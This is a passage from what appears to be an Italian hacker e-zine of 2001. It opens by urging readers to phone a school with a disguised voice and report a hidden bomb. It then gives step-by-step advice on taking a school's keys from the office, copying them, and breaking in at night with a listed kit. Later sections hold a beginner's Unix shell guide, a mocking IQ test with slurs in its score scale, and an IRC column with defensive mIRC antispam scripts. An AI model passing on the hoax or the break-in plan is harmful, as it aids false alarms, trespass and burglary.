oppure la mattina fare una chiamata a scuola con una voce modificata dicendo che è 
stata istallata un ordigno nascosto...alle media ci provammo funziono'.
Arrivarono i carabbi e restammo tutti noi alunni fuori per un'ora!!





METODO CHIAVI

Be' per alcuni potrebbe apparie uno stupido metodo...ma in realta' si puo' rivelare 
DAVVERO soddisfacente. Non dovete fare altro che andare a scuola di 
pomeriggio (per l'entrata principale!!) , praticamente quando tutti 
ci possono entrare per fare i corsi pomeridiani. Se qualche bidello 
da' fastidio dovete inventarvi una palla, magari che dovete consegnare 
una cosa alla prof. (portatevi qualche foglio che dovrete presentare 
alla prof se il bidello per caso vi accompagna!). 
In qualche modo poi dovrete entrare nella famigerata "segreteria".
E cercare li tutti i mazzi di chiavi.So che per molti sara' una cosa 
difficilissima ma noi abbiamo trovato i mazzi proprio li'!Dopodichè andate da un 
ferramenta e fate la copia di tutte le chiavi, tanto costa poco (1000 £ a chiave circa).
E infine riportate il tutto nel posto dove l'avete trovate; questo deve avvenire 
solo nel pomergiggio e non nei giorni seguenti.



MATERIALI per 3 persone


2 Torce, sopratutto se non c'è illuminazione
1 Scaletta, solo se è difficile raggiungere le finestre
3 Cellulari, per la comunicazione
Un abbigliamento che non da' nell'occhio. Preferibilmente nero.
2 Scooter fuori dal recintato farebbero comodo. Li lasciate parcheggiati.
1 Coltellino, che fa sempre comodo
1 Straccio, potreste usare anche la vostra maglia se è davvero vecchia

e naturalmente altro materiale come i vermi, per l'azione...

penso che basti.







sAluti


sYn                      syn@hackersat.com    www.hackersat.com












/===========================::=============================::=================/
/  /Shell for lamah /                                        Jrash            /
/===========================::=============================::=================/




1° PARTE Introduzione  
2° PARTE Procurarsi una shell
3° PARTE Cos è una shell
4° PARTE Connessione telnet con shell
5° PARTE Come registrare un account
6° PARTE Comandi fondamentali				

1° PARTE    		         
Salve ragazzi sono il vostro amicone Jrash, in questo articoletto vi parlero un po' 
della shell, e cioè cos è, come si usa, eccetera....	
Questo articolo è proprio per coloro che hanno voglia di imparare e cioè per coloro 
che si possono definire Hacker alle prime armi, anche io sono uno alle prime armi 
che pensate e questo e tutto cio che ho imparato finora...tutto questo, appunto lo 
devo al mio grande amico A[v]a[t]A[r] che mi ha insegnato queste cosette basilari.
Ora passiamo alla parte interessante perche credo che con questa intro vi abbia annoiato....
attenti pero a quello che dico mi raccomando!!!	


2° PARTE	  

Come procurarsi una shell??	
Questa è proprio na bella domanda!  
Non vi preoccupate che ci penso io a questo o gia provveduto! Ora vi daro un paio di siti 
dove potete trovare tranquillamente una shell.      
Eccovi i siti:  			
http://www.freeshells.net       
http://www.cyberspace.org
http://www.continuum.eu.org
http://dishboy.dyn.ml.org
http://www.nyx.net
http://vester.dyn.ml.org 
http://www.vexation.org
http://www.arbornet.org/projects.html
http://www.unixnet.org			
Per avere maggiori informazioni riguardo a come procurarsi una shell gratis 
andate a dare un occhiata all articolo del mio caro amico syn "FRREBIE E SHELL" che è 
stato pubblicato nel numero 2 della rivista dirtynet... 	
Per accedervi, una volta trovata, basta aprire un qualsiasi telnet e digitare per 
esempio cyberspace.org su host name, mentre lasciate invariate le altre impostazioni. 
Questa shell pero non è il massimo ma per un hacker alle prime armi va bene anzi benissimo...
Poi piu il la' quando sarete un po piu esperti sceglierete una shell migliore o anzi 
potete addirittura crearvela da voi.		


3° PARTE   		   

Cosa è una shell?	
è una cosa complicata da spiegare ma io ci provero' lo stesso in modo da farvi 
assimilare esattamente cosa sia .La shell e' quell'interfaccia, quella che al posto 
del solito prompt di MS-DOS o Windows tipo 
C:\>_ 
ci mostra un prompt del tipo
%
oppure
$
oppure
#				

Usare una shell è come usare il sistema UNIX e quindi potete eseguire molti comandi 
tipici di questo sistema.Avere una shell è fondamentale per chi vuole essere 
considerato un hacker e per chi ha voglia di imparare.


4° PARTE	
		
Ecco qui "ten Meinel Hall of Fame LAN and Internet Exploration Tools" by Carolyn P. Meinel, 
ovvero 10 comandi "that you absolutely must have access to":

1) telnet <host name> <port number>
fondamentale, se non puoi telnettarti con nessun sistema, "you are totally crippled as 
a hacker" e quindi cercati all'istante un'altra shell
2) who
mostra quali altri utenti sono connessi
3) netstat
mostra statistiche come per esempio la lista delle connessioni del 
server ad internet 
4) whois <hostname>
per avere informazioni su un sito internet
5) nslookup
altre info, cosi' come il prossimo comando
6) dig
7) finger
vedi l'altro articolo per l'e-zine :-)
8) ping
per vedere se un sito e' attivo e come e' la connessione a 
quell'host (lenta, veloce... ecc)
9) traceroute
traccia il percorso dei vari pacchetti spediti ad un certo host
10) ftp
per eseguire download e upload di files su altri computer.

Ora sta a voi giudicare la shell che avete appena trovato, se e' utile oppure da scartare.

5° PARTE		
Ok, allora vediamo un po' come funziona la piu' famose delle varie shell che 
sono in giro, ovvero la shell Grex, che trovate all'indirizzo

Cyberspace.org:23

Allora, per prima cosa vi trovate di fronte al saluto della macchina, e alla 
richiesta di login.
Dato che non vi siete mai collegati (o se l'avete fatto, rifatelo, cosi' almeno 
leggete anche questa parte dell'articolo eheheheh..) vi viene chiesto di digitare come:

full name:
address:
telephone number:
occupation:
computer equipment:
born:
sex:
interest:
comments:
Naturale che non siete obbligati a scrivere i vostri dati giusti giusti. 
Infine chiede se volete rendere pubblici i vostri dati oppure no.Segue la 
scelta della shell, nel senso dell'interprete dei comandi, la cosa piu' importante, 
perche' se scegliete una shell di cui non sapete i comandi... be''...dovrete cambiarla.
L'ultimo passo: la scelta della login e della pass, e poi siete a posto, avete la 
vostra shell, ripeto, che va benissimo per i vostri primi esperimenti di 
newbie (e lo siete, altrimenti avreste saltato a pie' pari quest'articolo eheheh!) 
ma che poi dovrete abbandonare per rimpiazzarla con la vostra shell di fiducia che 
vi permette i servizi citati nella parte 4ø.			

6° PARTE									
Be'... sono logicamente comandi UNIX, quindi:

-cd <nome dir>        per muoversi nel file system
-ls                   come il comando "dir" per dos
-cp <file1> <file2>   come il comando "copy" per dos
-rm <nome file>       come il comando "del" per dos
-mv <file1> <file2>   come il comando "move" per dos
-mkdir <nome dir>     come il comando "md" per dos
-rmdir <nome dir>     come il comando "rd" per dos
-man <comando>        fornisce info su quel comando
-more <file>          visualizza il file

Questi sono solo i comandi basilari per muoversi.	
Per ora è tutto ma se volete maggiori informazioni riguardo a telnet e i vari 
giochetti che si possono fare con esso, come per esempio mandare FAKEMAIL 
andate a dare un occhiata agli articoli del mio amico A[v]a[t]A[r] o sYn che vi giuro 
sono davvero ben fatti....				
Questi articoli potete trovarli nell 1° , nel 2° e nel 3° e anche in questo numero della 
rivista dirtynet,...
Potete trovarla sul sito www.hackersat.com  ........		
 Se avete dubbi, incertezze ed altro potete scrivermi al seguente indirizzo di posta 
elettronica: jrash@hackersat.com 		
Un grosso bacione per la mia amata Giada e per tutte le ragazze della 3c del severi 
di salerno!	ByEzZ.........................lol...................lol.....	
22/03/2001											

======H@=========H@=========H@========H@========H@=========H@=========H@=========[Jrash]°			     









/===========================::=============================::=================/
/  /Test d'intelligenza! /                                   sYn              /
/===========================::=============================::=================/




Contate quante risposte date esatte.
IMPORTANTE: riflettete bene sulle domande.


1)Punto la sveglia alle ore 9:00 e vado a dormire alle 8:00.Quante ore dormo?
-1

2)Entri in una stanza buia con un fiammifero in mano. Trovi una lampada a gas, una a 
petrolio ed una candela. Cosa accendi per prima?
-Il fiammifero

3)Dividi 30 x 2 e aggiungi 10.
-25

4)Un contadino ha 15 mucche.Muoino tutte tranne 9. Quante mucche sono vive?
-9

5) Il dottore ti ordina una cura veloce. 3 pastiglie da prendere in ogni mezz'ora, 
quante ore dura la cura ?
-1

6)In Russia un uomo puo' sparare alla sorella della sua vedova ?
-No

7)Quanti mesi hanno 28 giorni?
-Tutti

8)Il 25 Aprile c'è anche in Inghilterra ?
-Si

9)Perchè alcuni italiani portano le bretelle rosse, bianche e verdi?
-Per mantenersi i pantaloni

10)Cosa è successo il 25 Dicembre 1989?
-Il Natale

11)Quanti animali porto' Mosè sull'Arca ?
-Era Noè...

12)Un metronotte muore di giorno, gli danno la pensione ?
-No, è morto

13)Cade un aereo dalla Germania con 20 tedeschi a bordo, dove vengono seppelliti i superstiti?
-Se sono superstiti...

14)La mamma di Pierino ha tre figli :Quo' Qui' e ...?
-Pierino

15)Quante dita ha una mano? Due mani? 10 mani?
-5
-10
-50

16)Inuna vasca ci sono 10 pesci, ne annegano 5, quanti ne rimangono?
-Non annegano

17)Quante gambe ha un'elefante? Se ne alza una?
-4
-4

18)Un palazzo ha 12 piani ,ogni piano ha il nome di un mese, come si chiama l'ascensore ?
-Col pulsante

19)Se 5 ragazzi mangiano 5 gelati in 5 minuti, in quanto tempo 50 ragazzi mangeranno 50 gelati?
- minuti


 FINE






GRADI OTTENUTI
Su quante risposte errate.



1=superdotato
2=dotato
3=molto intelligente
4=intelligente
5=normale
6=quasi normale
7=stupido
8=molto stupido
9=idiota
10=molto idiota
11=tarato
12=cervello di gallina
13=senza possibilità di recupero
14=parassita della società
15=hanticappato
16=clinicamente morto
17=impossibile la convivenza
18=caso clinico perso













--=sYn=--=syn@hackersat.com=--www.hackersat.com=--     





/===========================::=============================::=================/
/  /L'approccio in rete e more... /                          sYn              /
/===========================::=============================::=================/


Salve ragazzi e ragazze!Preso un impegno io tendo sempre a mantenerlo.(chiedetelo a 
chi mi conosce meglio,anzi NO non glielo chiedete!)
Comunque sia, adesso mi appresto ad illustrarvi un po' come funzione l'approccio 
in rete; non solo con i sessi opposti. Sono stato meno approfondito ma decente 
a descrivere i comportamenti. Dato che voglio far divertire un po' Smav' passo 
subito alle caxxate vere e proprie:
(usando un mIRC client)

Entro in un canale della mia città o altri, ed ecco cosa mi succede :

Innanzitutto mi trovi in su' migliaia di query aperte che mi fanno porre un 
interrogativo : Che cazzo è????


Start of eresha buffer: Thu Mar 29 18:51:47 2001
<eresha> http://gina21.xorg2000.com
<ssYYnn> xchè ?
-> [eresha] PING
<ssYYnn> xchè dovrei andare in questo sito?
<ssYYnn> Stai facendo solo pubblicità ?
<ssYYnn> sono troppo noioso ?
End of eresha buffer    Thu Mar 29 18:51:47 2001

Naturalmente la chat è un ottimo posto per fare pubblicità al proprio sito. Molti 
sfruttano di tutto per tempestare con pubblicità gli utenti e metterli a 
conoscenza dei propri siti o altri...questo purtroppo è una cosa un po' 
rompiballe (avanti si porra' meglio il problema)
Il bello e che non ti rispondono. Cio' dico se my query devi anche sopportare 
la mia risposta..maro' mi fanno talmente incaxxare; un giorna di questi li 
devo flodda' a uno a uno e li devo rienpire di brutte parole.

Vabbè questo non è niente osseravate adesso.

Start of Stefaniet buffer: Thu Mar 29 18:42:11 2001
<Stefaniet> Ciaooo ho appena messo delle nuove foto sul mio sito, corri a 
  vederle http://www.stefania.allow.it ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto Messaggio) 
  )
End of Stefaniet buffer    Thu Mar 29 18:42:11 2001

Bello il nome peccato che quella delle foto non sei tu. Altrimenti ti sarei venuto 
a prendere a casa!!

Poi.

Start of P|4tin3t buffer: Thu Mar 29 18:42:29 2001
<P|4tin3t> www.sessopornohard.com - COME PROMESSO PRONTI GIA' SUL SITO, SIA DA 
  SCARICARE CHE DA VEDERE DIRETTAMENTE,!! 10 FILMINI HARD!!, E NUOVISSIME 
  IMMAGINI. www.sessopornohard.com - DIMENTICAVO DAL PRIMO APRILE NUOVO 
  SERVIZIO CON WEBCAM DAL VIVO CON CUI CHATTARE ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto 
  Messaggio) )
End of P|4tin3t buffer    Thu Mar 29 18:42:29 2001

Mettiamo caso che non ero io ma un bambimo ad avere questa query(tanto si sa' anche 
i ragazzini chattano) cosa avrebbe fatto?UUU che bello i filmini, che belle le 
immaginine, la webcamma bellissimo ci voglio andare mamma mamma....

.

Start of alessia78 buffer: Thu Mar 29 18:43:27 2001
<alessia78> Ciao, scusa il disturbo...volevo segnalarti un sito dove puoi 
  mandare infiniti SMS a tutti i GSM del mondo GRATUITAMENTE!! 
  www.elbaisola.com se non sei interessato...scusami! ( 0,4 ® PÎZzÄ §©rÎpT©1,0 
  (13Auto Messaggio) )
End of alessia78 buffer    Thu Mar 29 18:43:27 2001

Bello il nick...gia' mi aaspettavo qualcosa di sensuali alla "cliccami per godere" 
oppure www.hardhardxxx.comitnet il sito dove puoi trovare di tutto!Invece mi si 
presenta un bel messaggio automatico con tanti di scuse! Complimenti volevo 
quasi contattare l'autorema poi...ci ho ripensato.Cmq alessia78 ti voglio 
beneeeeeee. Scusate.

.

Start of Fuoco73 buffer: Thu Mar 29 18:40:04 2001
<Fuoco73> programmi gratis e tanto altro su www.xxxxxxxxservice.com ( 0,4 ® PÎZzÄ 
  §©rÎpT©1,0 (13Auto Messaggio) )
End of Fuoco73 buffer    Thu Mar 29 18:40:04 2001

Vaffanbip tu e i tuoi programmi...Cmq se lo sapete molti usano nomi femminili 
per attirare(ma questo era risaputo).A questi tipi potete fare gli scherzetti 
che fanno i lamerucci come ava !!

Sentite questa, è la dimostrazione che IRC a volte da' in testa !

Session Start: Thu Mar 29 18:44:42 2001
18:44:42 <Guest61533> ma de cheeeeeeeeeeeeeeeee
18:44:51 <ssYYnn> ?
 
-=> Nick: Guest61533 id: misterixe Host: ****.dialup.tiscalinet.it Full name: mister
-=> on chanz: #sesso #roma
-=> using server: twisted.ma.us.dal.net Global NAPs - Quincy, MA
 
18:45:05 <Guest61533> niente ciao
18:45:20 <ssYYnn> :|
Session Close: Thu Mar 29 18:52:13 2001

Questo tizio, mentre io sto tanto bello zitto e muto in rete mi chiama per 
dirmi :"ma de cheeeeeeeeeeeeeeeee" !!MA allora si scem...è vero dovrebbero mettere 
dei medici on line; ce ne è proprio la necessità (a volte mi farebbe comodo anche a me!)

Vedete questa.

Start of Yvano buffer: Thu Mar 29 18:44:31 2001
<Yvano> Ciao sono m ti posso fare una domanda?? 12 4°Tíþëttª S©®íþt° (4Messaggio 
  Automatico)
<ssYYnn> si
-> [Yvano] PING
<ssYYnn> ma....
<ssYYnn> che cazzo metti sto messaggio se poi non rispondi......
<ssYYnn> fXXK
End of Yvano buffer    Thu Mar 29 18:44:31 2001

Il tizio con un messaggio dice se poteva pormi una domanda e io EDUCATAMENTE dico
di sì. Ma dato che dall'altra parte il tizio è sordo (non vedente!) lo rispondo
meno educatamente di prima...dopo un po' mi trovo con la scritta:

-Yvano- m'hai rotto er kazzo! [-Ignorato-] °Tíþëttª S©®íþt°

Pfff. sono cose da pazzi...



Bene bene,adesso inizia il dialogo(chiamatelo anche dialogo!!!) :

arriva un tizio con un nome un po' da frescone.


Session Start: Mon Mar 26 22:41:54 2001
22:41:54 <fresco17> ciao
22:42:46 <ssYYnn> ciao
22:42:47 <ssYYnn> sono m
22:42:55 <fresco17> addio allora
Session Close: Mon Mar 26 22:42:59 2001

(io ormai ho imparato MOLTO bene la lezione, quindi appena vedo un nome maschile che mi 
saluta io non faccio altro che dirgli :Ciao,sono m.Fino ad ora questo metodo ha 
funzionato benissimo, ve lo consiglio !:)
Cosa è successo allora ? Mica ho detto che sono un drogato?Un pedofilo?Un 
ninfomane?Un arrapato mentale?Ho detto semplicemento che sono di sesso maschile.
E lui addirittura mi rispobde così:"<fresco17> addio allora" !!!Cavolo a me fa 
piacere che non ci sentiremo +, pero' un po di educazione non guasta.

adesso ci proco io.

Session Start: Tue Mar 27 20:16:49 2001
20:16:50 <ssYYnn> ciao
Session Close: Tue Mar 27 20:25:25 2001

MMM nessuna risposta, strano lo ho anche pingata, ho un brutto nickname? Impossibile 
ho visto gente con dei nick SPAVENTOSI e RIVOLTANTI avere le migliori discussioni in rete!!

Riproviamo, il nick mi convince.

Session Start: Tue Mar 27 20:16:39 2001
20:16:42 <ssYYnn> ciao ofelia
20:17:20 <ofelia83> ciao
20:17:31 <ssYYnn> sei di salerno ?
20:22:30 <ssYYnn> ci 6 ?
20:22:40 <ssYYnn> ho sbagliato domanda ?
20:22:42 CTCP: PING To: ofelia83
Session Close: Tue Mar 27 20:25:23 2001

Ma che cavolo è ma sono tanto antipatico, un normale ragazzo ditemi allora come puo' 
iniziare un normale dialogo con una ragazza della propria città...poi dicono tramite 
la chat si puo' arrivare al matrimonio..seeee..il matrimonio puo' avvenire ma sarà 
tra due anomali di mente! Sfrutto l'occasione per dirvi che ho avuto solo con una 
ragazza dela mia città una lunga discussione, con tanto di scambio numeri,che oserei 
dire bellissima...ma questo a mio resoconto è solo un caso raro.


continuiamo.Adesso è un tizio che mi contatta.

Session Start: Mon Mar 26 22:31:18 2001
Session Ident: Guest54347 (aaa@sa1-753.dialup.tiscalinet.it)
22:31:18 <Guest54347> ciao anni da dove dgt????
22:31:27 <ssYYnn> sono m
22:31:41 <ssYYnn> ti interesso ?
22:31:59 <Guest54347> addiiiiioooooooooooooo!!!!!!!!!!!!!!!!!!!!!
22:32:08 <ssYYnn> grazie
22:32:18 <Guest54347> prego
Session Close: Mon Mar 26 22:33:04 2001

Questa volta all'addio lo ho risposto, anche se molto semplicemente.Proprio non c'è 
un metodo per scampare ad una query e agli auto messaggi,anzi per gli automessaggio 
degli insulsi script vi farebbe molto comodo azionare un'antispam; magari settando 
le parole chiavi tipo :

auto
Benvenuto
Crackrock
DDD-YYY-NNN-AAA-MMM-III-RRR-CCC
http
JudoX
M3n0k4
Mâgïç
PÎZzÄ
script
S[R|pT
S¢riþT
SçRÎpT
Venom
Welcome
www
ynamirc
§©®îpt
ÐÏÊ
ëgátiñØ
Simpson

Ultimamente questo add-on si trova su svariati script.Ma dato che io sono molto "un 
bravo ragazzo" ve li inserisco here :


questo è l'antispam n°1

_____________________________________________________________________________________
                                  ANTISPAM N°1

leggimi.txt

--www.hackersat.com-- leggimi.txt

To install this addon type
/load -rs antispam\installa.ini

Per installare questa addon scrivi
/load -rs antispam\installa.ini


   Please no rip this script
Non rippare questo questo script
              Bye

spam.txt

dialog ms-antispam {
  title "hackersat ANTISPAM"
  size -1 -1 230 225
  box "Scritto da Lains", 49, 5 5 220 180
  text "ON", 1, 110 25 70 15
  text "OF", 2, 158 25 70 15
  text "Sex-Url", 3, 40 50 60 15
  text "M o F?", 4, 40 70 60 15
  text "CyberSex-Prot", 5, 40 90 70 15
  text "Inviti", 6, 40 110 70 15
  text "Spam-Script", 7, 40 130 70 15
  text "Insulti", 8, 40 150 70 15
  radio "", 12, 110 53 20 10, right group
  radio "", 13, 158 53 20 10, right
  radio "", 14, 110 73 20 10, right group
  radio "", 15, 158 73 20 10, right
  radio "", 16, 110 93 20 10, right group
  radio "", 17, 158 93 20 10, right
  radio "", 18, 110 113 20 10, right group
  radio "", 19, 158 113 20 10, right
  radio "", 20, 110 133 20 10, right group
  radio "", 21, 158 133 20 10, right
  radio "", 22, 110 153 20 10, right group
  radio "", 23, 158 153 20 10, right
  button "Chiudi Il Dialog", 24, 20 190 200 25, ok default
}
on 1:dialog:ms-antispam:sclick:*: {
  if ($did == 12) { enable #Protezionesesso | echo 3 Protezione SeX URL ON }
  if ($did == 13) { disable #Protezionesesso | echo 3 Protezione SeX URL OFF }
  if ($did == 14) { enable #mof | echo 3 M o F on }
  if ($did == 15) { disable #mof | echo 3 M o F off }
  if ($did == 16) { enable #cybersexprot | echo 3 Protezione C-sex ON }
  if ($did == 17) { disable #cybersexprot | echo 3 Protezione C-SEX OFF }
  if ($did == 18) { enable #invitiprot | echo 3 Protezione inviti ON }
  if ($did == 19) { disable #invitiprot | echo 3 Protezione inviti OFF }
  if ($did == 20) { enable #scriptitaliani | echo 3 Protezione Spam Script ON }
  if ($did == 21) { disable #scriptitaliani | echo 3 Protezione Spam Script OFF }
  if ($did == 22) { enable #insulti-prot | echo 3 Protezione Insulti-Prot ON }
  if ($did == 23) { disable #insulti-prot | echo 3 Protezione Insulti-Prot OFF }
} 
menu menubar {
M-S Prot Query:/dialog -m ms-antispam ms-antispam

frasi.txt

#Protezionesesso off
on 1:text:*www*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot
on 1:text:*http*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot
on 1:text:*XXX*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot
#Protezionesesso end
#cybersexprot off
on 1:text:*donna*per*cybersex*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*cerco*donna*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*sei*lurida*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*donna*disinibita*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*cerco*donna*per*sesso*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*sei*porca*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
#cybersexprot end
#mof off
on 1:text:*M*o*F*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No M o F!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No M o F!! Prot
#mof end
#invitiprot off
on 1:text:*tutti*su*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*ti*aspetto*su*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*join*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*e'*nato*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*ndate*su*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*vieni*su*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*entate*su*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*ti*aspettiamo*su*#*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*#*il*canale*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
#invitiprot end
#scriptitaliani off
on 1:text:*S©®íþt*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*PÎZzÂ*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Auto*Messaggio*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Messaggio*Automatico*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Auto*Messa*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*dynamirc*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*hello.to*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*move.to*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Dynamrc*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.(MonDoScRiPT)
on 1:text:*Ðynamrc*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.(MonDoScRiPT)
on 1:text:*4(512Dynamirc54)*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.
#scriptitaliani end
#insulti-prot off
on @1:text:*puttan*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*troia*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*mignott*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*vaffancul*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*bastard*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*sborr*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*porcodi*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*fotti*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*pompin*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*sgualdrin*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:dio por*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:dio ca*:?:/close -m $nick | /ignore -u30 $nick  | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
#insulti-prot end

installa.ini

[script]
n0=;Antispam install
n1=on 1:load: {
n2=load -rs antispam\frasi.txt
n3=load -rs antispam\spam.txt
n4=echo Antispam Caricato
n5=echo E' una fase beta e verra' aggiornata
n6=echo Consigli sono molto graditi. Hackersat.com
n7=unload -rs antispam\installa.ini
n8=}

_____________________________________________________________________________________

ed ecco il secondo

_____________________________________________________________________________________
                                  ANTISPAM N°2

leggimi.txt

 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
                    ANTISPAM
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=

 /load -rs antispam.ini per caricarlo. Funziona 
 con mIRC 5.6 o superiori.

 inserisci il file sp.bmp nella directory di mirc.exe

 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
                     ANTISPAM
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=

sp.bmp

(inseritegli un'immagine qualunque come titolo,90 x 12,2 pixel)

antispam.ini

[script]
n0=;           x.X.X.
n1=;          xXxXXXX"
n2=;         "XxXXK*`8b
n3=;         "xXX'88888)
n4=;      o   `X''.."""    o
n5=;      8)iiiiiIIIIIiiii(8
n6=;      '    "iiIIII"    `   Antispam hackersat.com
n7=;            ]iIII[ script costruito leggendo le guide di helpdesk.
n8=;            iiIIII
n9=;          _."iiII"._
n10=;         a888o  a888o
n11=on 1:load:  {
n12=  echo -a $versione.antipspam
n13=  echo -a AntiSpam v.2.0. funziona con  mIRC 5.6 e superiori, tu ora stai usando il mIRC 4 $VERSION
n14=  echo -a --new-- Fixato bug nell'edit box che non permetteva di inserire parole lunghe
n15=  echo -a --new-- Tolto il remove ascii che creava solo casini aggiuntivi
n16=  echo -a per bloccare uno spam o una url che ti arriva di frequente in query, inserisci la parola intera nell'edit e clikka su add.
n17=  echo -a $versione.antipspam
